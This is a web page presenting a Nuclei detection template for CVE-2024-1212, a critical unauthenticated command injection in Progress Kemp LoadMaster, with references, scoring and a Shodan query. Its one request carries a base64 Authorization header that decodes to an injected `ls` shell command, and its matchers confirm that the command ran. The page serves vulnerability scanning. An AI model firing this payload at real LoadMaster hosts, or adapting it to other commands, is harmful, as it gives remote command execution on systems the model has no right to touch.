Skip to content

Progress Kemp LoadMaster - Command Injection

ID: CVE-2024-1212

Severity: critical

Author: DhiyaneshDK

Tags: cve,cve2024,progress,rce,loadmaster,kev

Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution.

id: CVE-2024-1212
info:
name: Progress Kemp LoadMaster - Command Injection
author: DhiyaneshDK
severity: critical
description: |
Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution.
reference:
- https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster
- https://support.kemptechnologies.com/hc/en-us/articles/23878931058445-LoadMaster-Security-Vulnerability-CVE-2024-1212
- https://support.kemptechnologies.com/hc/en-us/articles/24325072850573-Release-Notice-LMOS-7-2-59-2-7-2-54-8-7-2-48-10-CVE-2024-1212
- https://nvd.nist.gov/vuln/detail/CVE-2024-1212
- https://freeloadbalancer.com/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2024-1212
cwe-id: CWE-78
epss-score: 0.00213
epss-percentile: 0.59325
metadata:
verified: true
max-request: 1
shodan-query: html:"LoadMaster"
tags: cve,cve2024,progress,rce,loadmaster,kev
http:
- method: GET
path:
- "{{BaseURL}}/access/set?param=enableapi&value=1"
headers:
Authorization: "Basic JztsczsnOmRvZXNub3RtYXR0ZXI="
matchers-condition: and
matchers:
- type: word
part: body
words:
- "bin"
- "mnt"
- "WWW-Authenticate: Basic"
condition: and
- type: status
status:
- 200
# digest: 4a0a004730450220558992cf78b1eacd81546d0715d2f501efd633e81d3c1751bc4d9a039f3a2a5a022100919d936a2042cd1e62298d9492db858a3325f335b382eaed3d92ee10eb7a2441:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-1212.yaml"

View on Github